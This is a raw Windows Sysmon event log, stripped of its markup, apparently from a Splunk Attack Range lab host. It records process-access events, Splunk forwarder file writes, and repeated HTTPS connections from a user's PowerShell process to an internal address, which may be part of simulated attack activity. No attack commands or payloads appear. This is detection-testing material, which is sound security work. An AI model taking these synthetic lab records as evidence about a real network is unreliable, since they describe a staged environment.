22:02:11.107{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.107{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.107{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.107{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.107{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8463-613A-F996-03000000C801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.107{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8463-613A-F996-03000000C801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.095{B81B27B7-8463-613A-F996-03000000C801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:12.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B31DCC16FFF31BFF08ED4BAA50C403FC,SHA256=3F1F32BD032F64977CA4AFC095BBD929FD8FA665AD735FA3234388721F15BFB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:13.591{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:37.508{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62264-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:38.360{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62265-false10.0.1.12-8000- 23542300x800000000000000035129335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:14.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CCCA194EA09AF6723CC948D5CA5E3B3,SHA256=A77E2C66D3D276923B491D317CD7854EEF1E8B1A994474E0EB357054C1729417,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:15.205{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85A88829A69F520763C1B393A306D92C,SHA256=CB533052FF84516F5B39316EE58614CE54A587482D2CBF0343131307AD2539C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.357{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4FE5241A72DACD168F1FF747683007B3,SHA256=852AA23A432FE2A023652F00B12EE9B7AF9615E44750AC0228F509C1E0E5F162,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.357{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CFABB29747F47496C78A19165039A38,SHA256=F37A667B820B1BE0671BF07D1866098413AD3D74C128C08A1083764465DBB1D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:17.520{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCAC4A28D356B08A2F6017D64477C892,SHA256=C59A3AFF518B491DE2C356F75F5D5CAF3B3B929F5CE593AC4344E151FB0B7FEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:18.686{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AEA6C6F791B83A00AC6A0E6DD199C91,SHA256=7BB61F72B6337BE62EA35417867D59F02B1CEBB58D33EADAAC636D50A7E845D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:19.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C247B31DAA7BFD18096BDB082933CF7,SHA256=62B2625671F8747B041B6EA239514DAC40CEF0DC6998381195187E603C2B78D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:19.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6249712929F3DAD332BB4C8A2E78EF4,SHA256=ACF74E73496A69EBF5076868AD1CF27689950060D45EECF0743DA3C8DA130E02,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:19.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70864912822456A741EE96DF0FE195FB,SHA256=F3AC71B1A14D4450629786FF34C36097ABE9AA35561D30D8E9F89A701BEE4980,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:43.526{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62266-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:44.288{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62267-false10.0.1.12-8000- 23542300x800000000000000035129350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:21.618{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=93F06EE3835EC5F7F4299BB71A3AE9DF,SHA256=D9566FA2FC38C3BDE72B6FAB23DF46691EC59A9D8C9CC76B1C38809F4915D955,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:21.615{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3263E445BFB1FD8E546CF2CB90ABF23E,SHA256=D20627912024D8DB8142730A4680250DCAAF47E5205A35B4C0FD08EB0B6A3E42,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:21.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CDF7BAA145FA1A0CDA24AE8D88067F1F,SHA256=7C3D6CD52CF7F0178310930C5E505136811989814C4ADE82D385441A77D765EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:21.016{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BFBA44A54CEEF51C3AF2FF0879C2851,SHA256=EA01EDF9395D14ACB6D7644FC95A5152AFB737E3082685B98EC94CA85107F246,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:22.037{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C977045783F64BA301E7C3F260520D2,SHA256=23FE157B13231360F191A65DC30CAC05B71FFBC61EDF76CFA31D1AD4FA67C07A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:23.051{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E27BD06AB3256DED8612BEE0C1E971,SHA256=669071206C34815A17C60CF9D6F0ED3A18D35B4E7F2E93A81268B698E684C3C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:49.536{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62269-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:49.383{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62268-false10.0.1.12-8000- 23542300x800000000000000035129354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:24.519{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=240DF54622BB49E9E176ABCC997ECF22,SHA256=221650116736AB5A2BF5F89D819D3B2FA3EDF1B82466E9A17CD015F272917E75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:24.067{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E408C8814E1B96DBE868C286BADFDCFD,SHA256=5814C5E90E68240AB26F858866E6B207CE1428F60147B749C99EEF87896A2457,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:25.097{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C74D256B4E5E81FD5012321460AE78B,SHA256=E53AA463AC58DEF206E02A427B55FB7F64A53D396CFC72F451C0A12F26FBE1AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.880{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8472-613A-FA96-03000000C801}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.880{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.880{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.880{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.880{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.880{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8472-613A-FA96-03000000C801}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.880{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8472-613A-FA96-03000000C801}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 